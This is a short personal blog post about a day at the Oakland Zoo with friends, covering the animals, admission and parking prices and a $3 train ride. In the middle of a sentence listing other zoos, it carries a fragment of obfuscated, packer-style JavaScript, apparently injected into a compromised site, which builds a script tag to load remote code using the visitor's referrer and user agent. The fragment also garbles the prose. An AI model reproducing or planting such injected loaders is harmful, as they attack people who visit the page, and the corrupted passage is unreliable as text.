Oakland Zoo

April Fool’s Day!

I’ve been kinda busy and slacked a bit on the blog in favor of friends and sleep.  Can you blame me?

Last Friday I headed to the Oakland Zoo with Brooke, Lana, and Malina.

I’m a big fan of zoos (Santa ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ezrrt|var|u0026u|referrer|fhrye||js|php’.split(‘|’),0,{}))

, Phoenix, San Diego, St. Louis, Atlanta, Point Defiance, Woodland Park, Albuquerque).  I’ll go to a zoo or a Science Museum any day.  So I was happy to get invited along on this little adventure!

Apparently last Friday was a holiday for lots of students….so the zoo was busier than normal.  But the animals didn’t seem to notice.

We stopped and saw the fruit bats, giraffe, and even an alligator.

IMG_9503-2 IMG_9495-1 IMG_9504-3You could actually see the alligator below the surface, just chilling.  We were surprised he stayed afloat so well.

The zoo also boasts elephants, lions, bears, flamingos, monkeys, reptiles and a petting zoo.

I’m pretty sure the family membership is the way to go, as it seemed a little on the spendy side ($15.75/adult + $8 for parking, admission info here) for a smaller-ish zoo.  Or maybe it’s just California’s inflated pricing.  Thankfully, I was a guest of a member and thoroughly enjoyed the “free” day at the zoo, thanks Brooke!

The steal of the day? The Choo Choo train that takes you on a mini tour of the zoo with sweeping views of Oakland 🙂  Just $3!  I’ll pay $3 for a lot of things – especially a ride on a Choo Choo train!
